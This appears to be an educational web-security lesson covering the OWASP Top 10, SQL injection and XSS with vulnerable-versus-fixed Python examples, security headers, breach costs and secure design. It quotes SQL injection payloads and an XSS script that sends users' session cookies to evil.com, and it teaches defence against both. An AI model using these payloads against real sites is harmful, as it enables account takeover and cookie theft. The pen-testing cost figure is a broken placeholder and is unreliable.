
The OWASP Top 10: security's greatest hits

OWASP (Open Web Application Security Project) maintains a list of the most critical web security risks. Here are the big ones:

Injection attacks

Hackers insert malicious code into your application. The most common is SQL injection: tricking a database into running commands it shouldn't.

Example: A login form expects a username. Instead, an attacker enters: ' OR '1'='1

This becomes: SELECT * FROM users WHERE username = '' OR '1'='1'. Since '1'='1' is always true, the condition matches every row, and the attacker logs in as the first user returned (usually admin).

Broken authentication

Weak authentication lets attackers impersonate users: unlimited login attempts (brute force), weak password requirements, sessions that don't expire, or credentials sent over plain HTTP instead of HTTPS.

Other critical vulnerabilities

Rank | Vulnerability | Simple explanation
3 | Sensitive data exposure | Passwords in plain text, unencrypted credit cards
4 | XML External Entities (XXE) | Malicious XML files that read server files
5 | Broken access control | Users accessing data they shouldn't by changing a URL
6 | Security misconfiguration | Default passwords, unnecessary features enabled
7 | Cross-site scripting (XSS) | Injecting malicious scripts into web pages
8 | Insecure deserialization | Manipulating data objects to run malicious code
9 | Using vulnerable components | Outdated libraries with known security holes
10 | Insufficient logging | Not knowing you were attacked until it's too late

The rule: Never trust the client. Verify permissions on every request.

02. SQL injection and XSS: explained in detail

SQL injection: attacking the database

If user input gets inserted directly into SQL queries, attackers can modify those queries.

Vulnerable code (pseudo-code):

query = "SELECT * FROM users WHERE username = '" + userInput + "'"

Attack input: admin' --

Resulting query:

SELECT * FROM users WHERE username = 'admin' --'

The -- comments out the rest of the query, so any password check that followed (for example, AND password = '...') is never evaluated.

The fix: Use parameterized queries (prepared statements). Never concatenate user input into SQL.
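The two payloads from this lesson (' OR '1'='1 and admin' --) run against a concatenated query and against its parameterized fix. This is an added example, not code from the original page; the in-memory user table and the sha256 stand-in for a real password hash are constructed for illustration.

```python
import hashlib
import sqlite3


def sha256(text):
    # Stand-in only: a real system should use a slow password hash (bcrypt, argon2).
    return hashlib.sha256(text.encode()).hexdigest()


def make_db():
    # Constructed in-memory user table with sample accounts (not from any real system).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    for name, pw in (("admin", "correct-horse"), ("alice", "hunter2")):
        conn.execute("INSERT INTO users (username, pw_hash) VALUES (?, ?)", (name, sha256(pw)))
    return conn


def count_users_vulnerable(conn, username):
    # Concatenation: the input ' OR '1'='1 becomes SQL logic and matches every row.
    query = "SELECT COUNT(*) FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchone()[0]


def count_users_safe(conn, username):
    # Placeholder: the driver sends the value separately; it is only ever compared as text.
    return conn.execute("SELECT COUNT(*) FROM users WHERE username = ?", (username,)).fetchone()[0]


def login_vulnerable(conn, username, password):
    # The admin' -- payload closes the string and comments out the password check.
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND pw_hash = '" + sha256(password) + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Prepared statement: both values are bound as data, so the grammar cannot change.
    row = conn.execute("SELECT username FROM users WHERE username = ? AND pw_hash = ?",
                       (username, sha256(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(count_users_vulnerable(db, "' OR '1'='1"), count_users_safe(db, "' OR '1'='1"))
    print(login_vulnerable(db, "admin' --", "wrong"), login_safe(db, "admin' --", "wrong"))
```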

Cross-site scripting (XSS): attacking other users

XSS injects malicious scripts into web pages that other users see.

Attacker posts in a comment section: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script>

When other users view the comment, their browser runs the script and sends their session cookie to the attacker.

Types of XSS:

  • Stored XSS: malicious script saved to the database
  • Reflected XSS: script is in the URL, reflected back immediately
  • DOM-based XSS: script manipulates the page structure directly

The fix: Sanitize all user input. Escape special characters. Use modern frameworks that do this automatically.
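Escaping the comment payload from this lesson before it is written into HTML, so the browser renders it as text rather than running it. This is an added example, not code from the original page; the comment string is the one quoted above and the render functions are hypothetical.

```python
import html

# Constructed sample comment: the stored-XSS payload quoted in the lesson.
COMMENT = "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>"


def render_comment_vulnerable(text):
    # Interpolating raw user text into HTML sends <script> to the browser as live markup.
    return '<div class="comment">' + text + '</div>'


def render_comment_safe(text):
    # Escaping turns < > & " ' into entities; the browser displays them as literal characters.
    return '<div class="comment">' + html.escape(text, quote=True) + '</div>'


def render_attribute_safe(title):
    # Attribute context: quote=True is essential, otherwise a " can close the attribute
    # and smuggle in a new one such as onmouseover=.
    return '<a title="' + html.escape(title, quote=True) + '">link</a>'


if __name__ == "__main__":
    print(render_comment_vulnerable(COMMENT))
    print(render_comment_safe(COMMENT))
    print(render_attribute_safe('x" onmouseover="alert(1)'))
```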

AI pitfall
AI code generators frequently build SQL queries by concatenating user input directly into query strings, producing code vulnerable to injection out of the box. Always review AI-generated database code for parameterized queries.
03. When breaches happen: the real cost

Data breaches cost millions in fines (GDPR, the European data-protection regulation: up to 4% of global revenue), lawsuits, forensic investigations, and downtime. The hidden costs (reputation damage, employee burnout, and technical debt from rushed patches) often exceed the direct costs.

Famous breaches

Company | Year | Cause | Impact
Equifax | 2017 | Unpatched server | 147 million records, $700M+ settlement
Target | 2013 | Vendor credentials stolen | 40 million credit cards, $290M costs
Yahoo | 2013-14 | State-sponsored attack | 3 billion accounts, $350M off sale price
Marriott | 2018 | Acquired compromised system | 500 million guests, £18M GDPR fine
The lesson
Security isn't a feature you add later. The cost of prevention is always less than the cost of a breach.
04. Security headers: the easy wins

Web servers can send headers that tell browsers how to behave: one-line configurations that prevent whole classes of attacks.

Header | What it does | Why it matters
Content-Security-Policy | Restricts what resources can load | Prevents XSS by blocking inline scripts
X-Frame-Options | Prevents page from being embedded | Stops clickjacking attacks
X-Content-Type-Options | Prevents MIME type sniffing | Stops browsers from executing disguised files
Strict-Transport-Security | Forces HTTPS for a period | Prevents downgrade attacks
Referrer-Policy | Controls referrer information | Limits data leakage
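A small checker for the five headers in the table, run over a constructed set of response headers. This is an added example, not code from the original page; the sample headers, the one-year HSTS threshold and the check function are assumptions made for illustration.

```python
import re

# Constructed sample response headers, as a misconfigured server might send them.
SAMPLE_HEADERS = {
    "Content-Type": "text/html",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline'",
    "Strict-Transport-Security": "max-age=3600",
    "X-Frame-Options": "DENY",
}

EXPECTED = ["Content-Security-Policy", "X-Frame-Options", "X-Content-Type-Options",
            "Strict-Transport-Security", "Referrer-Policy"]
ONE_YEAR = 31536000  # seconds; common recommended minimum for HSTS max-age


def check_security_headers(headers):
    """Return a list of findings for the headers discussed in the lesson."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    findings = []
    for name in EXPECTED:
        if name.lower() not in h:
            findings.append("missing " + name)
    csp = h.get("content-security-policy", "")
    if "'unsafe-inline'" in csp:
        # Inline scripts are exactly what XSS injects; allowing them defeats the point of CSP.
        findings.append("CSP allows 'unsafe-inline', which weakens XSS protection")
    hsts = h.get("strict-transport-security", "")
    m = re.search(r"max-age=(\d+)", hsts)
    if hsts and (not m or int(m.group(1)) < ONE_YEAR):
        findings.append("HSTS max-age below one year")
    xcto = h.get("x-content-type-options", "")
    if xcto and xcto.lower() != "nosniff":
        findings.append("X-Content-Type-Options should be 'nosniff'")
    xfo = h.get("x-frame-options", "")
    if xfo and xfo.upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options should be DENY or SAMEORIGIN")
    return findings


if __name__ == "__main__":
    for finding in check_security_headers(SAMPLE_HEADERS):
        print("-", finding)
```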
05. Penetration testing: ethical hacking

Penetration testing (pen testing) is hiring security experts to attack your system before real attackers do.

Three types: Black box (testers know nothing), gray box (limited knowledge), white box (full access to source code).

The process: Reconnaissance, scanning, exploitation, post-exploitation, then a report with findings and remediation steps.

Good to know
Pen testing costs CALLOUT0K-CALLOUT00K+ depending on scope. For smaller budgets, consider bug bounty programs where researchers are paid per vulnerability found.
06. Security by design

Core principles

  • Least privilege: Give users the minimum access they need
  • Defense in depth: Multiple layers of protection, not a single measure
  • Fail securely: When something breaks, fail to a secure state
  • Don't trust user input: Validate everything server-side

Security in the development lifecycle

Phase | Security activity
Design | Threat modeling, security requirements
Development | Secure coding training, code reviews
Testing | Automated security scans, pen testing
Deployment | Security configuration review
Operations | Monitoring, incident response plans